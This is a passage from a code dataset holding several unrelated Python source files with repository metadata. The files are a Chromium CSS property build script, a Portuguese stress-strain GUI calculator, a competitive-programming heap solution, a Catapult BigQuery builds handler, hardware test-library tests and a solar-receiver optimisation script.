('Collision detected - two properties have the same name and '\n 'priority, a potentially non-deterministic ordering can '\n 'occur: {}, {} and {}'.format(\n key, property_['name'], sorting_keys[key]))\n sorting_keys[key] = property_['name']\n self._longhands.sort(key=lambda p: p['sorting_key'])\n self._shorthands.sort(key=lambda p: p['sorting_key'])\n\n # The sorted index becomes the CSSPropertyID enum value.\n for property_ in self._longhands + self._shorthands:\n property_['enum_value'] = self._last_used_enum_value\n self._last_used_enum_value += 1\n # Add the new property into the map of properties.\n assert property_['property_id'] not in self._properties_by_id, \\\n ('property with ID {} appears more than once in the '\n 'properties list'.format(property_['property_id']))\n self._properties_by_id[property_['property_id']] = property_\n\n self.expand_aliases()\n self._properties_including_aliases = self._longhands + \\\n self._shorthands + self._aliases\n\n def expand_aliases(self):\n for i, alias in enumerate(self._aliases):\n assert not alias['runtime_flag'], \\\n \"Property '{}' is an alias with a runtime_flag, \"\\\n \"but runtime flags do not currently work for aliases.\".format(\n alias['name'])\n aliased_property = self._properties_by_id[\n enum_for_css_property(alias['alias_for'])]\n updated_alias = aliased_property.copy()\n updated_alias['name'] = alias['name']\n updated_alias['alias_for'] = alias['alias_for']\n updated_alias['aliased_property'] = 
aliased_property['upper_camel_name']\n updated_alias['property_id'] = enum_for_css_property_alias(\n alias['name'])\n updated_alias['enum_value'] = aliased_property['enum_value'] + \\\n self._alias_offset\n updated_alias['upper_camel_name'] = upper_camel_case(alias['name'])\n updated_alias['lower_camel_name'] = lower_camel_case(alias['name'])\n self._aliases[i] = updated_alias\n\n def expand_parameters(self, property_):\n def set_if_none(property_, key, value):\n if key not in property_ or property_[key] is None:\n property_[key] = value\n\n # Basic info.\n property_['property_id'] = enum_for_css_property(property_['name'])\n property_['upper_camel_name'] = upper_camel_case(property_['name'])\n property_['lower_camel_name'] = lower_camel_case(property_['name'])\n property_['is_internal'] = property_['name'].startswith('-internal-')\n name = property_['name_for_methods']\n if not name:\n name = upper_camel_case(property_['name']).replace('Webkit', '')\n set_if_none(property_, 'inherited', False)\n\n # Initial function, Getters and Setters for ComputedStyle.\n property_['initial'] = 'Initial' + name\n simple_type_name = str(property_['type_name']).split('::')[-1]\n set_if_none(property_, 'name_for_methods', name)\n set_if_none(property_, 'type_name', 'E' + name)\n set_if_none(\n property_,\n 'getter',\n name if simple_type_name != name else 'Get' + name)\n set_if_none(property_, 'setter', 'Set' + name)\n if property_['inherited']:\n property_['is_inherited_setter'] = 'Set' + name + 'IsInherited'\n\n # Figure out whether we should generate style builder implementations.\n for x in ['initial', 'inherit', 'value']:\n suppressed = x in property_['style_builder_custom_functions']\n property_['style_builder_generate_%s' % x] = not suppressed\n\n # Expand StyleBuilderConverter params where necessary.\n if property_['type_name'] in PRIMITIVE_TYPES:\n set_if_none(property_, 'converter', 'CSSPrimitiveValue')\n else:\n set_if_none(property_, 'converter', 'CSSIdentifierValue')\n\n # Expand out field templates.\n if property_['field_template']:\n self._field_alias_expander.expand_field_alias(property_)\n\n type_name = property_['type_name']\n if (property_['field_template'] == 'keyword' or\n property_['field_template'] == 'multi_keyword'):\n default_value = type_name + '::' + \\\n enum_value_name(property_['default_value'])\n elif (property_['field_template'] == 'external' or\n property_['field_template'] == 'primitive' or\n property_['field_template'] == 'pointer'):\n default_value = property_['default_value']\n else:\n assert property_['field_template'] == 'monotonic_flag', \\\n \"Please put a valid value for field_template; got \" + \\\n str(property_['field_template'])\n property_['type_name'] = 'bool'\n default_value = 'false'\n property_['default_value'] = default_value\n\n property_['unwrapped_type_name'] = property_['type_name']\n if property_['wrapper_pointer_name']:\n assert property_['field_template'] in ['pointer', 'external']\n if property_['field_template'] == 'external':\n property_['type_name'] = '{}<{}>'.format(\n property_['wrapper_pointer_name'], type_name)\n\n # Default values for extra parameters in ComputedStyleExtraFields.json5.\n set_if_none(property_, 'custom_copy', False)\n set_if_none(property_, 'custom_compare', False)\n set_if_none(property_, 'mutable', False)\n\n @property\n def default_parameters(self):\n return self._default_parameters\n\n @property\n def aliases(self):\n return self._aliases\n\n @property\n def shorthands(self):\n return self._shorthands\n\n @property\n 
def longhands(self):\n        return self._longhands\n\n    @property\n    def properties_by_id(self):\n        return self._properties_by_id\n\n    @property\n    def properties_including_aliases(self):\n        return self._properties_including_aliases\n\n    @property\n    def first_property_id(self):\n        return self._first_enum_value\n\n    @property\n    def last_property_id(self):\n        return self._first_enum_value + len(self._properties_by_id) - 1\n\n    @property\n    def last_unresolved_property_id(self):\n        return self._last_unresolved_property_id\n\n    @property\n    def alias_offset(self):\n        return self._alias_offset\n\n    @property\n    def extra_fields(self):\n        return self._extra_fields\n","repo_name":"kiwibrowser/src","sub_path":"third_party/blink/renderer/build/scripts/core/css/css_properties.py","file_name":"css_properties.py","file_ext":"py","file_size_in_byte":12081,"program_lang":"python","lang":"en","doc_type":"code","stars":2475,"dataset":"github-code","pt":"52"} +{"seq_id":"2253131751","text":"from pylab import plot, show, legend, title, xlabel, ylabel, axis\r\nfrom matplotlib import pyplot as plt\r\nimport math\r\n\r\n\r\nimport PySimpleGUI as sg\r\n\r\n\r\nsg.theme('Random')\r\n\r\nlayout = [\r\n    [sg.Text('Informe os Valores:')],\r\n    [sg.Text('Comprimento Inicial (m):', size=(22, 1,)), sg.InputText(size=(10,5))],\r\n    [sg.Text('Diâmetro Inicial (m): ', size=(22, 1)), sg.InputText(size=(10,5))],\r\n    [sg.Text('Força (N):', size=(22, 1)), sg.InputText(size=(10,5))],\r\n    [sg.Text('Comprimento Instantâneo (m):', size=(22, 1)), sg.InputText(size=(10,5))],\r\n    [sg.Text('Diâmetro Instantâneo', size=(22, 1)), sg.InputText(size=(10,5))],\r\n    [sg.Submit('Registar'), sg.Cancel('Sair')]\r\n]\r\n\r\nwindow = sg.Window('IHM', layout)\r\nevent, values = window.read()\r\nwindow.close()\r\n\r\nsg.popup('Você registrou os seguintes valores',\r\n         'Comprimento Inicial',values[0],\r\n         'Diâmetro Inicial', values[1],\r\n         'Força (N)', values[2],\r\n         'Comprimento Instantâneo', values[3],\r\n         'Diâmetro Instantâneo', values[4],\r\n\r\n         title=\"Valores Registrados\")\r\n\r\ncomprimento_Inicial = float(values[0])\r\ndiametro_Inicial = float(values[1])\r\n\r\n\r\nforca = int(values[2])\r\ncomprimento_Instantaneo = float(values[3])\r\ndiametro_Instantaneo = float(values[4])\r\n\r\n\r\ntensao_De_Engenharia = forca / (3.14 * (diametro_Inicial / 2) ** 2)\r\ndeformacao_De_Engenharia = (comprimento_Instantaneo - comprimento_Inicial) / comprimento_Inicial\r\ntensao_Verdadeira = forca / (3.14 * (diametro_Instantaneo / 2) ** 2)\r\ndeformacao_Verdadeira = math.log(comprimento_Instantaneo / comprimento_Inicial)\r\n\r\nsg.popup('Valores Calculados',\r\n         'Tensão de Engenharia',tensao_De_Engenharia,\r\n         'Deformação de Engenharia', deformacao_De_Engenharia,\r\n         'Tensão Verdadeira', tensao_Verdadeira,\r\n         'Deformação Verdadeira', deformacao_Verdadeira,\r\n\r\n         'CLIQUE EM OK PARA GERAR O GRÁFICO',\r\n         title=\"Valores Calculados\")\r\n\r\n\r\nengenharia = [deformacao_De_Engenharia, tensao_De_Engenharia]\r\nreal = [deformacao_Verdadeira, tensao_Verdadeira]\r\n\r\nplot(engenharia, marker=\"o\")\r\nplot(real, marker=\"o\")\r\n\r\ntitle('Tensão vs Deformação')\r\n\r\nxlabel('Deformação')\r\nylabel('Tensão (MPa)')\r\nlegend(['Engenharia','Real'])\r\n\r\naxis(ymin=0,ymax=570000)\r\naxis(xmin=0, xmax=2)\r\n\r\nplt.grid()\r\nshow()\r\n\r\n\r\n","repo_name":"allefbcc/Codigos-em-Python","sub_path":"pythonProject/grafico.py","file_name":"grafico.py","file_ext":"py","file_size_in_byte":2319,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"13097094725","text":"from sys import stdin\nimport heapq\n\n\ndef solution(users):\n users.sort()\n counter = {}\n heap = []\n seats = [1]\n for s, e in users:\n while heap and heap[0][0] < s:\n heapq.heappush(seats, heapq.heappop(heap)[1])\n if seats:\n seat = heapq.heappop(seats)\n else:\n seat = len(heap) + 1\n heapq.heappush(heap, (e, seat))\n counter[seat] = counter.get(seat, 0) + 1\n\n print(max(counter))\n print(' '.join(map(lambda x: str(x[1]), sorted(counter.items()))))\n\nN = int(stdin.readline())\nusers = [list(map(int, stdin.readline().strip().split(' '))) for _ in range(N)]\n\nsolution(users)","repo_name":"grasshopperTrainer/coding_practice","sub_path":"baekjoon/accepted/12764 싸지방에 간 준하.py","file_name":"12764 싸지방에 간 준하.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"12507783145","text":"import collections\nimport logging\nimport re\nimport time\n\nfrom google.appengine.api import urlfetch\nimport webapp2\n\nfrom base import bigquery\nfrom base import constants\nfrom common import buildbot\n\n\nclass Builds(webapp2.RequestHandler):\n\n def get(self):\n urlfetch.set_default_fetch_deadline(300)\n\n bq = bigquery.BigQuery()\n\n current_events = []\n events = []\n for master_name in constants.MASTER_NAMES:\n builders = buildbot.Builders(master_name)\n available_builds = _AvailableBuilds(builders)\n recorded_builds = _RecordedBuilds(bq, builders, available_builds)\n for builder in builders:\n # Filter out recorded builds from available builds.\n build_numbers = (available_builds[builder.name] -\n recorded_builds[builder.name])\n builder_current_events, builder_events = _TraceEventsForBuilder(\n builder, build_numbers)\n current_events += builder_current_events\n events += builder_events\n\n jobs = []\n if current_events:\n jobs += bq.InsertRowsAsync(\n constants.DATASET, constants.CURRENT_BUILDS_TABLE,\n current_events, truncate=True)\n if events:\n jobs += bq.InsertRowsAsync(constants.DATASET, constants.BUILDS_TABLE,\n events)\n\n for job in jobs:\n bq.PollJob(job, 60 * 20) # 20 minutes.\n\n\ndef _AvailableBuilds(builders):\n available_builds = {}\n for builder in builders:\n if not builder.cached_builds:\n available_builds[builder.name] = frozenset()\n continue\n\n max_build = max(builder.cached_builds)\n # Buildbot on tryserver.chromium.perf is occasionally including build 0 in\n # its list of cached builds. That results in more builds than we want.\n # Limit the list to the last 100 builds, because the urlfetch URL limit is\n # 2048 bytes, and \"&select=100000\" * 100 is 1400 bytes.\n builds = frozenset(build for build in builder.cached_builds\n if build >= max_build - 100)\n available_builds[builder.name] = builds\n return available_builds\n\n\ndef _RecordedBuilds(bq, builders, available_builds):\n # 105 days / 15 weeks. 
Must be some number greater than 100 days, because\n # we request up to 100 builds (see above comment), and the slowest cron bots\n # run one job every day.\n start_time_ms = -1000 * 60 * 60 * 24 * 105\n table = '%s.%s@%d-' % (constants.DATASET, constants.BUILDS_TABLE,\n start_time_ms)\n\n conditions = []\n for builder in builders:\n if not available_builds[builder.name]:\n continue\n max_build = max(available_builds[builder.name])\n min_build = min(available_builds[builder.name])\n conditions.append('WHEN builder = \"%s\" THEN build >= %d AND build <= %d' %\n (builder.name, min_build, max_build))\n\n query = (\n 'SELECT builder, build '\n 'FROM [%s] ' % table +\n 'WHERE CASE %s END ' % ' '.join(conditions) +\n 'GROUP BY builder, build'\n )\n query_result = bq.QuerySync(query, 600)\n\n builds = collections.defaultdict(set)\n for row in query_result:\n builds[row['f'][0]['v']].add(int(row['f'][1]['v']))\n return builds\n\n\ndef _TraceEventsForBuilder(builder, build_numbers):\n if not build_numbers:\n return (), ()\n\n build_numbers_string = ', '.join(map(str, sorted(build_numbers)))\n logging.info('Getting %s: %s', builder.name, build_numbers_string)\n\n # Fetch build information and generate trace events.\n current_events = []\n events = []\n\n builder_builds = builder.builds.Fetch(build_numbers)\n query_time = time.time()\n for build in builder_builds:\n if build.complete:\n events += _TraceEventsFromBuild(builder, build, query_time)\n else:\n current_events += _TraceEventsFromBuild(builder, build, query_time)\n\n return current_events, events\n\n\ndef _TraceEventsFromBuild(builder, build, query_time):\n match = re.match(r'(.+) \\(([0-9]+)\\)', builder.name)\n if match:\n configuration, host_shard = match.groups()\n host_shard = int(host_shard)\n else:\n configuration = builder.name\n host_shard = 0\n\n # Build trace event.\n if build.end_time:\n build_end_time = build.end_time\n else:\n build_end_time = query_time\n os, os_version, role = _ParseBuilderName(builder.name)\n yield {\n 'name': 'Build %d' % build.number,\n 'start_time': build.start_time,\n 'end_time': build_end_time,\n\n 'build': build.number,\n 'builder': builder.name,\n 'configuration': configuration,\n 'host_shard': host_shard,\n 'hostname': build.slave_name,\n 'master': builder.master_name,\n 'os': os,\n 'os_version': os_version,\n 'role': role,\n 'status': build.status,\n 'url': build.url,\n }\n\n # Step trace events.\n for step in build.steps:\n if not step.start_time:\n continue\n\n if step.name == 'steps':\n continue\n\n if step.end_time:\n step_end_time = step.end_time\n else:\n step_end_time = query_time\n yield {\n 'name': step.name,\n 'start_time': step.start_time,\n 'end_time': step_end_time,\n\n 'benchmark': step.name, # TODO(dtu): This isn't always right.\n 'build': build.number,\n 'builder': builder.name,\n 'configuration': configuration,\n 'host_shard': host_shard,\n 'hostname': build.slave_name,\n 'master': builder.master_name,\n 'os': os,\n 'os_version': os_version,\n 'role': role,\n 'status': step.status,\n 'url': step.url,\n }\n\n\ndef _ParseBuilderName(builder_name):\n builder_name = builder_name.lower()\n\n for os in ('android', 'linux', 'mac', 'win'):\n if os in builder_name:\n break\n else:\n os = None\n\n if 'build' in builder_name or 'compile' in builder_name:\n role = 'builder'\n else:\n role = 'tester'\n\n return (os, None, 
role)\n","repo_name":"kiwibrowser/src","sub_path":"third_party/catapult/firefighter/update/handlers/builds.py","file_name":"builds.py","file_ext":"py","file_size_in_byte":5788,"program_lang":"python","lang":"en","doc_type":"code","stars":2475,"dataset":"github-code","pt":"52"} +{"seq_id":"38774492501","text":"import random\nfrom hwtypes import BitVector\nimport fault\nfrom fault.actions import Poke, Expect, Eval, Step, Print\nfrom fault.array import Array\nfrom fault.vector_builder import VectorBuilder\nfrom .common import (TestBasicCircuit, TestBasicClkCircuit,\n TestNestedArraysCircuit)\n\n\ndef test_tester_basic():\n circ = TestBasicCircuit\n builder = VectorBuilder(circ)\n builder.process(Poke(circ.I, BitVector[1](0)))\n builder.process(Expect(circ.O, BitVector[1](0)))\n assert builder.vectors == [[BitVector[1](0), BitVector[1](0)]]\n builder.process(Eval())\n assert builder.vectors == [[BitVector[1](0), BitVector[1](0)],\n [BitVector[1](0), fault.AnyValue]]\n\n\ndef test_tester_clock():\n circ = TestBasicClkCircuit\n builder = VectorBuilder(circ)\n builder.process(Poke(circ.I, BitVector[1](0)))\n builder.process(Print(\"%x\", circ.O))\n builder.process(Expect(circ.O, BitVector[1](0)))\n assert builder.vectors == [\n [BitVector[1](0), BitVector[1](0), fault.AnyValue]\n ]\n builder.process(Poke(circ.CLK, BitVector[1](0)))\n assert builder.vectors == [\n [BitVector[1](0), BitVector[1](0), BitVector[1](0)]\n ]\n builder.process(Step(circ.CLK, 1))\n assert builder.vectors == [\n [BitVector[1](0), BitVector[1](0), BitVector[1](0)],\n [BitVector[1](0), fault.AnyValue, BitVector[1](1)]\n ]\n\n\ndef test_tester_nested_arrays():\n circ = TestNestedArraysCircuit\n builder = VectorBuilder(circ)\n expected = []\n for i in range(3):\n val = random.randint(0, (1 << 4) - 1)\n builder.process(Poke(circ.I[i], BitVector[4](val)))\n builder.process(Expect(circ.O[i], BitVector[4](val)))\n expected.append(val)\n assert builder.vectors == [[Array(expected, 3), Array(expected, 3)]]\n","repo_name":"leonardt/fault","sub_path":"tests/test_vector_builder.py","file_name":"test_vector_builder.py","file_ext":"py","file_size_in_byte":1816,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"52"} +{"seq_id":"1269511823","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Oct 15 20:00:57 2020\r\n\r\n@author: z5158936\r\n\"\"\"\r\nif __name__ == '__main__':\r\n __spec__ = None\r\n \r\n import pandas as pd\r\n import numpy as np\r\n from scipy.optimize import fsolve\r\n import matplotlib.pyplot as plt\r\n from matplotlib import cm\r\n import matplotlib.patches as patches\r\n from importlib import reload\r\n import gc\r\n import BDR\r\n # BDR = reload(BDR)\r\n \r\n def A_rqrd(rO,*args):\r\n #This function is to calculate the required area given some\r\n A_rcv_rq,Dsgn_CPC,xrc,yrc,zrc,Cg = args\r\n N_CPC, V_CPC = BDR.CPC_Design(Dsgn_CPC)\r\n CPC = BDR.CPC_Params( Dsgn_CPC, xrc,yrc,zrc, {'rO':rO,'Cg':Cg} )\r\n A_rcv = CPC['A_rcv']\r\n return A_rcv - A_rcv_rq\r\n \r\n ################################################\r\n ################ MAIN PROGRAM ##################\r\n ################################################\r\n \r\n # Operational Modes:\r\n # 1 #Testing one single value\r\n # 2 #Testing different heights, fzvs and powers\r\n # 3 #Testing different designs and concentration ratio\r\n \r\n op_mode = 1\r\n \r\n if op_mode == 1:\r\n zfs = [50]\r\n fzvs = [0.83]\r\n Cgs = [2.]\r\n Dsgns = ['A']\r\n Pels = [10.]\r\n \r\n fldr_rslt = 'BDR_OptimCase'\r\n fldr_rslt = 
'Paper_Results'\r\n file_rslt = ''\r\n write_f = False\r\n plot = False\r\n \r\n if op_mode == 2:\r\n zfs = [50,]\r\n # fzvs = np.arange(0.812,0.851,0.002)\r\n fzvs = np.arange(0.770,0.810,0.002)\r\n Cgs = [2.]\r\n Dsgns = ['A']\r\n Pels = [5,4,3,2]\r\n \r\n fldr_rslt = 'BDR_OptimCase'\r\n file_rslt = fldr_rslt+'/1-Pvar_final.txt'\r\n write_f = True\r\n plot = False\r\n \r\n if op_mode == 3:\r\n zfs = [50]\r\n fzvs = np.arange(0.75,0.85,0.02)\r\n Cgs = [3.0,4.0]\r\n Dsgns = ['A']\r\n Pels = [10]\r\n plot = True\r\n \r\n fldr_rslt = 'BDR_OptimCase'\r\n file_rslt = fldr_rslt+'/1-CPC_final.txt'\r\n write_f = True\r\n \r\n ############################################\r\n fldr_dat = 'Datasets_Final'\r\n txt_header = 'Pel\\tzf\\tfzv\\tCg\\tDsgn\\teta_hbi\\teta_cos\\teta_blk\\teta_att\\teta_hbi\\teta_cpi\\teta_cpr\\teta_CPC\\teta_BDR\\teta_SF\\tQ_acc\\tN_hel\\tS_hel\\tS_HB\\tS_CPC\\tH_CPC\\trO\\tQ_max\\tstatus\\n'\r\n # if write_f: f = open(file_rslt,'w'); f.write(txt_header); f.close()\r\n \r\n ########### Running the loop ###############\r\n for (zf,fzv,Cg,Dsgn_CPC,Pel) in [(zf,fzv,Cg,Dsgn_CPC,Pel) for zf in zfs for fzv in fzvs for Cg in Cgs for Dsgn_CPC in Dsgns for Pel in Pels]:\r\n \r\n case = 'zf_{:d}_fzv_{:.3f}_Cg_{:.1f}_Dsgn_{}_Pel_{:.1f}'.format(zf,fzv,Cg,Dsgn_CPC,Pel)\r\n print(case)\r\n\r\n #Defining the conditions for the plant\r\n CST = BDR.CST_BaseCase(zf=zf,fzv=fzv,P_el=Pel)\r\n \r\n #Files for initial data set and HB intersections dataset\r\n file_SF = fldr_dat+'/Rays_Data_height_{:.0f}'.format(zf)\r\n file_HB = fldr_dat+'/Basecase_zf{:.0f}_fzv{:.3f}_R1'.format(CST['zf'],CST['fzv'])\r\n \r\n #Getting the receiver area and the characteristics for CPC\r\n A_rcv_rq = CST['P_th'] / CST['Q_av'] #Area receiver\r\n rO = fsolve(A_rqrd, 1.0, args=(A_rcv_rq,Dsgn_CPC,CST['xrc'],CST['yrc'],CST['zrc'],Cg))[0]\r\n CPC = BDR.CPC_Params( Dsgn_CPC, CST['xrc'],CST['yrc'],CST['zrc'], {'rO':rO,'Cg':Cg} )\r\n \r\n \r\n ### Calling the optimisation function\r\n ######################################################################\r\n ######################################################################\r\n \r\n R2, Etas, SF, CPC, HB, hlst, Q_rcv, status = BDR.Optimisation(CST,CPC,file_SF,file_HB)\r\n \r\n ######################################################################\r\n ######################################################################\r\n \r\n #Some postcalculations\r\n S_CPC,H_CPC,rO = [ CPC[x] for x in ['S_CPC','H','rO'] ]\r\n N_hel = len(hlst)\r\n S_hel = N_hel * CST['A_h1']\r\n Pel_real = SF.loc[hlst]['Q_acc'].max() * (CST['eta_pb']*CST['eta_sg']*CST['eta_rc'])\r\n \r\n #Printing the result on file\r\n text_r = '\\t'.join('{:.3f}'.format(x) for x in [Pel,zf, fzv, Cg])\r\n text_r = text_r + '\\t'+Dsgn_CPC+'\\t'+ '\\t'.join('{:.4f}'.format(x) for x in [CST['eta_hbi'], Etas['Eta_cos'], Etas['Eta_blk'], Etas['Eta_att'], Etas['Eta_hbi'], Etas['Eta_cpi'], Etas['Eta_cpr'], Etas['Eta_CPC'], Etas['Eta_BDR'], Etas['Eta_SF']])+'\\t'\r\n text_r = text_r + '\\t'.join('{:.2f}'.format(x) for x in [ Pel_real, N_hel, S_hel, HB['S_HB'], S_CPC,H_CPC,rO,Q_rcv.max()])+'\\t'+status+'\\n'\r\n print(text_r[:-2])\r\n \r\n if write_f: f = open(file_rslt,'a'); f.write(text_r); f.close()\r\n \r\n # R2.to_pickle('R2_basecase.plk')\r\n # np.save('Q_rcv',Q_rcv) \r\n #####################################################################\r\n #####################################################################\r\n ############################ PLOTING ################################\r\n 
#####################################################################\r\n #####################################################################\r\n \r\n if plot:\r\n \r\n N_CPC,V_CPC,rO,rA,Cg = [ CPC[x] for x in ['N','V','rO','rA','Cg'] ] \r\n xrc, yrc, zrc = [CST[x] for x in ['xrc','yrc','zrc']]\r\n x0,y0 = BDR.CPC_Centers(Dsgn_CPC,rA,xrc,yrc)\r\n xCA, yCA, xCO, yCO = [],[],[],[]\r\n for i in range(N_CPC):\r\n xA,yA = BDR.CPC_XY_R(rA,H_CPC,V_CPC,N_CPC,x0[i],y0[i],zrc)\r\n xO,yO = BDR.CPC_XY_R(rO,H_CPC,V_CPC,N_CPC,x0[i],y0[i],zrc) \r\n xCA.append(xA);xCO.append(xO);yCA.append(yA);yCO.append(yO);\r\n xCA=np.array(xCA);xCO=np.array(xCO);yCA=np.array(yCA);yCO=np.array(yCO)\r\n xmin,xmax,ymin,ymax = xCA.min(), xCA.max(), yCA.min(), yCA.max()\r\n \r\n \r\n ###### Ploting CPC shape\r\n Nx = 100; Ny = 100\r\n dx = (xmax-xmin)/Nx; dy = (ymax-ymin)/Ny\r\n dA = dx*dy\r\n dx = (xmax-xmin)/Nx; dy = (ymax-ymin)/Nx; dA=dx*dy\r\n \r\n fig = plt.figure(figsize=(10,10))\r\n # plt.scatter(R2['xr'],R2['yr'],c='b',s=0.01)\r\n for N in range(N_CPC):\r\n plt.plot(xCA[N],yCA[N],c='k')\r\n plt.plot(xCO[N],yCO[N],c='k')\r\n plt.grid()\r\n plt.xlim(xmin,xmax);plt.ylim(ymin,ymax);\r\n fig.savefig(fldr_rslt+'/'+case+'_shape.png', bbox_inches='tight')\r\n plt.close()\r\n \r\n ###### Ploting CPC efficiency points\r\n fig = plt.figure(figsize=(10,10))\r\n ax = fig.add_subplot(111, aspect='equal')\r\n ax.scatter(R2[(R2['hit_cpc']==0)]['xc'], R2[(R2['hit_cpc']==0)]['yc'],s=0.1)\r\n ax.scatter(R2[(R2['hit_cpc']>0)&(~R2['hit_rcv'])]['xc'], R2[(R2['hit_cpc']>0)&(~R2['hit_rcv'])]['yc'],s=0.1,c='gray')\r\n for N in range(N_CPC):\r\n ax.plot(xCA[N],yCA[N],c='k')\r\n ax.plot(xCO[N],yCO[N],c='k')\r\n ax.grid()\r\n ax.set_xlim(xmin,xmax);ax.set_ylim(ymin,ymax);\r\n \r\n ax.annotate(r'$\\eta_{{cpo}}={:.2f}$'.format(Etas['Eta_cpr']),(-2.5,-2.5),fontsize=18, backgroundcolor='white')\r\n ax.annotate(r'$\\eta_{{cpi}}={:.2f}$'.format(Etas['Eta_cpi']),(4.,-5.8),fontsize=18, backgroundcolor='white')\r\n \r\n ax.annotate('Design A:',(1.05,0.29),xycoords='axes fraction', fontsize=18)\r\n ax.annotate('3-hexagon',(1.05,0.26),xycoords='axes fraction', fontsize=18)\r\n ax.annotate(r'$z_{{f}}={:.1f}m$'.format(zf),(1.05,0.20),xycoords='axes fraction', fontsize=18)\r\n ax.annotate(r'$f_{{v}}={:.2f}$'.format(fzv),(1.05,0.16),xycoords='axes fraction', fontsize=18)\r\n ax.annotate(r'$P_{{el}}={:.1f}MW_e$'.format(Pel),(1.03,0.12),xycoords='axes fraction', fontsize=18)\r\n ax.annotate(r'$C_{{CPC}}={:.1f}$'.format(Cg),(1.05,0.08),xycoords='axes fraction', fontsize=18)\r\n \r\n \r\n kw0 = dict(arrowstyle=\"Simple, tail_width=2.0, head_width=6, head_length=10\", color=\"k\")\r\n ax.add_patch(patches.FancyArrowPatch((-1.5, -2), (-1.0, -0.5), connectionstyle=\"arc3,rad=-0.2\", zorder=10, **kw0))\r\n ax.add_patch(patches.FancyArrowPatch((3.9, -5.8), (2.5, -4.5), connectionstyle=\"arc3,rad=-0.2\", zorder=10, **kw0))\r\n \r\n plt.show()\r\n fig.savefig(fldr_rslt+'/'+case+'_no_hitting.png', bbox_inches='tight')\r\n plt.close()\r\n \r\n break\r\n \r\n #####################################################\r\n ######## HYPERBOLOID RADIATION MAP ##################\r\n \r\n f_s = 18\r\n out2 = R2[(R2['hel_in'])&(R2['hit_hb'])]\r\n xmin = out2['xb'].min(); xmax = out2['xb'].max()\r\n ymin = out2['yb'].min(); ymax = out2['yb'].max()\r\n Nx = 100; Ny = 100\r\n dx = (xmax-xmin)/Nx; dy = (ymax-ymin)/Nx; dA=dx*dy\r\n Fbin = CST['eta_rfl']*Etas['Eta_cos']*Etas['Eta_blk']*(CST['Gbn']*CST['A_h1']*N_hel)/(1e3*dA*len(out2))\r\n Q_HB,X,Y = 
np.histogram2d(out2['xb'],out2['yb'],bins=[Nx,Ny],range=[[xmin, xmax], [ymin, ymax]],density=False)\r\n fig = plt.figure(figsize=(12, 12))\r\n # ax = fig.add_subplot(111, title='Ray density on hyperboloid surface (upper view)', aspect='equal')\r\n ax = fig.add_subplot(111, aspect='equal')\r\n X, Y = np.meshgrid(X, Y)\r\n \r\n vmin = 0\r\n vmax = (np.ceil(Fbin*Q_HB.max()/10)*10)\r\n surf = ax.pcolormesh(X, Y, Fbin*Q_HB.transpose(),cmap=cm.YlOrRd,vmin=vmin,vmax=vmax)\r\n ax.set_xlabel('E-W axis (m)',fontsize=f_s);ax.set_ylabel('N-S axis (m)',fontsize=f_s);\r\n cb = fig.colorbar(surf, shrink=0.25, aspect=4)\r\n cb.ax.tick_params(labelsize=f_s)\r\n fig.text(0.77,0.62,r'$Q_{HB}(kW/m^2)$',fontsize=f_s)\r\n for tick in ax.xaxis.get_major_ticks(): tick.label.set_fontsize(f_s)\r\n for tick in ax.yaxis.get_major_ticks(): tick.label.set_fontsize(f_s)\r\n \r\n # from matplotlib import rc\r\n # rc('text', usetex=True)\r\n fig.text(0.77,0.35,'Main Parameters',fontsize=f_s-3)\r\n fig.text(0.77,0.33,r'$z_{f\\;}=50 m$',fontsize=f_s-3)\r\n fig.text(0.77,0.31,r'$f_{zv}=0.83$',fontsize=f_s-3)\r\n fig.text(0.77,0.29,r'$z_{rc}=10 m$',fontsize=f_s-3)\r\n fig.text(0.77,0.27,r'$\\eta_{hbi}=0.95$',fontsize=f_s-3)\r\n \r\n r1 = patches.Circle((0.,0.0), HB['rlims'][0], zorder=10,color='black',fill=None)\r\n r2 = patches.Circle((0.,0.0), HB['rlims'][1], zorder=10,edgecolor='black',fill=None)\r\n ax.add_artist(r1)\r\n ax.add_artist(r2)\r\n ax.grid(zorder=20)\r\n # fig.savefig(fldr_rslt+'/'+case+'_QHB_upper.pdf', bbox_inches='tight')\r\n fig.savefig(fldr_rslt+'/'+case+'_QHB_upper.png', bbox_inches='tight')\r\n # plt.show()\r\n plt.close()\r\n print(Q_HB.sum())\r\n del out2\r\n \r\n #########################################################\r\n #Q BDR Distribution\r\n N_CPC,V_CPC,rO,rA,Cg = [ CPC[x] for x in ['N','V','rO','rA','Cg'] ] \r\n xrc, yrc, zrc = [CST[x] for x in ['xrc','yrc','zrc']]\r\n x0,y0 = BDR.CPC_Centers(Dsgn_CPC,rA,xrc,yrc)\r\n xCA, yCA, xCO, yCO = [],[],[],[]\r\n for i in range(N_CPC):\r\n #Plotting hexagons\r\n xA,yA = BDR.CPC_XY_R(rA,H_CPC,V_CPC,N_CPC,x0[i],y0[i],zrc)\r\n xO,yO = BDR.CPC_XY_R(rO,H_CPC,V_CPC,N_CPC,x0[i],y0[i],zrc) \r\n xCA.append(xA);xCO.append(xO);yCA.append(yA);yCO.append(yO);\r\n xCA=np.array(xCA);xCO=np.array(xCO);yCA=np.array(yCA);yCO=np.array(yCO)\r\n xmin,xmax,ymin,ymax = xCA.min(), xCA.max(), yCA.min(), yCA.max()\r\n \r\n fig = plt.figure(figsize=(14, 8))\r\n ax = fig.add_subplot(111, title='Ray density map on CPC aperture plane (upper view)', aspect='equal')\r\n for N in range(N_CPC):\r\n ax.plot(xCA[N],yCA[N],c='k')\r\n ax.plot(xCO[N],yCO[N],c='k')\r\n Q,x,y,surf = ax.hist2d(R2['xc'],R2['yc'], bins=100, range= [[xmin,xmax], [ymin,ymax]] , cmap=cm.YlOrRd)\r\n cbar = fig.colorbar(surf, shrink=0.5, aspect=4)\r\n ax.set_xlabel('X axis (m)');ax.set_ylabel('Y axis (m)');\r\n fig.savefig(fldr_rslt+'/'+case+'_radmap_ap.png', bbox_inches='tight')\r\n plt.grid()\r\n # plt.show()\r\n plt.close()\r\n \r\n ##############################################################\r\n Nx = 100; Ny = 100\r\n dx = (xmax-xmin)/Nx; dy = (ymax-ymin)/Ny\r\n dA = dx*dy\r\n dx = (xmax-xmin)/Nx; dy = (ymax-ymin)/Nx; 